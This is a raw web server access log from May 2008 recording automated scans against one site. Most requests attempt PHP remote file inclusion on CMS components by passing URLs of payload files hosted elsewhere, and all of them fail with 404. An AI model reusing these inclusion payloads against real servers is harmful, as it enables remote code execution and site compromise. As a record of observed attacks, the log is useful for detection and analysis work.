77.79.246.70 - - [18/May/2008:18:08:40 -0700] "GET /logs/access_080211.log//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:08:41 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:08:41 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "neighborhoodglimpses.com"
67.195.37.175 - - [18/May/2008:18:09:15 -0700] "GET /logs/access.log HTTP/1.0" 200 26912 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:13:06 -0700] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:13:59 -0700] "GET /logs/access.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:13:59 -0700] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:14:00 -0700] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:14:23 -0700] "GET /logs//administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:14:24 -0700] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
85.214.32.233 - - [18/May/2008:18:14:45 -0700] "GET /logs/access.log//faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.32.233 - - [18/May/2008:18:14:46 -0700] "GET //faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.214.32.233 - - [18/May/2008:18:14:46 -0700] "GET /logs//faqsupport/samplefaqsupport.php?path[docroot]=http://www.termotecnia.cl/mb/administrator/components/com_x-shop/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:16:19 -0700] "GET /logs/access.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:16:20 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.88.26.118 - - [18/May/2008:18:16:20 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:19:12 -0700] "GET /logs/access.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:20:11 -0700] "GET /logs/access.log/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:20:11 -0700] "GET /skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:20:11 -0700] "GET /logs/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:21:48 -0700] "GET /logs/access_080211.log//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.11.122 - - [18/May/2008:18:21:48 -0700] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://ieras.ru/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:22:18 -0700] "GET /logs/access.log/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:22:18 -0700] "GET /skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:22:18 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:24:25 -0700] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:24:26 -0700] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:26:07 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:26:07 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:26:08 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:26:08 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:27:55 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:27:55 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:27:55 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
77.79.246.70 - - [18/May/2008:18:30:38 -0700] "GET /logs/access_080407.log//doceboCms/class/class.dashboard_cms.php?where_framework=http://www.2knowit.net/arab.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:32:33 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:32:34 -0700] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:32:34 -0700] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:35:09 -0700] "GET /logs/access_080211.log/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:35:09 -0700] "GET /skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:35:09 -0700] "GET /logs/skin/zero_vote/error.phphttp://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:36:42 -0700] "GET /logs/access_080211.log/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:36:42 -0700] "GET /skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:36:42 -0700] "GET /logs/skin/zero_vote/error.php?dir=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:38:35 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:38:35 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/sex.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:38:36 -0700] "GET /index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
85.31.205.148 - - [18/May/2008:18:38:36 -0700] "GET /logs/index.php?sourcedir=http://sos.org.uk/cbcbcb/.a/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:40:15 -0700] "GET /logs/access.log//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:40:15 -0700] "GET //index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:40:15 -0700] "GET /logs//index.php?option=com_log&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:44:11 -0700] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:44:11 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:44:11 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:22 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:22 -0700] "GET /logs/access_080211.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:22 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:33 -0700] "GET //components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:33 -0700] "GET /logs/access.log//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
218.38.34.229 - - [18/May/2008:18:44:33 -0700] "GET /logs//components/com_mp3_allopass/allopass.php?mosConfig_live_site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:45:52 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:45:52 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
216.6.180.69 - - [18/May/2008:18:45:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/xpl/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:23 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:24 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:24 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.forte-industries.com/news/ooid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:37 -0700] "GET /logs/access.log/index.php?site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:37 -0700] "GET /index.php?site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:37 -0700] "GET /logs/index.php?site=http://www.47rclan.com/ultrastats/include/%20%20%20/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:41 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:42 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
85.18.11.77 - - [18/May/2008:18:49:42 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://www.dresswerk.de//administrator/components/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:18:50:53 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:18:50:53 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
216.139.221.64 - - [18/May/2008:18:50:53 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.215.80.101 - - [18/May/2008:18:51:16 -0700] "GET /main.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
213.215.80.101 - - [18/May/2008:18:51:16 -0700] "GET /main.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:18:51:42 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:18:51:42 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
216.110.12.93 - - [18/May/2008:18:51:43 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.neighborhoodglimpses.com"
213.215.80.101 - - [18/May/2008:18:52:00 -0700] "GET /main.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/old? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
213.215.80.101 - - [18/May/2008:18:52:00 -0700] "GET /main.php?sit=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/1? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:18:52:19 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:18:52:19 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
195.82.99.126 - - [18/May/2008:18:52:19 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:52:30 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:52:30 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:52:31 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:52:51 -0700] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:52:51 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
205.134.245.2 - - [18/May/2008:18:52:51 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://123123.itrello.com/echo.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:18:53:16 -0700] "GET /logs//skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
217.67.26.84 - - [18/May/2008:18:53:17 -0700] "GET //skin/zero_vote/error.php?dir=ftp://77.91.227.68/upload/tmp/1422423437/24224234310/oldbisok?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:54:46 -0700] "GET /logs/access_080211.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:54:46 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
67.19.105.42 - - [18/May/2008:18:54:47 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/masprast/file/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:18:55:23 -0700] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:18:55:23 -0700] "GET /logs/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:18:56:07 -0700] "GET /pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
204.11.238.133 - - [18/May/2008:18:56:07 -0700] "GET /logs/pmd_arcade_1_0_final/sources/libs/geoip/DNS/RR.php?phpdns_basedir=http://123123.itrello.com/id15.txt?? HTTP/1.1" 404 275 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.neighborhoodglimpses.com"
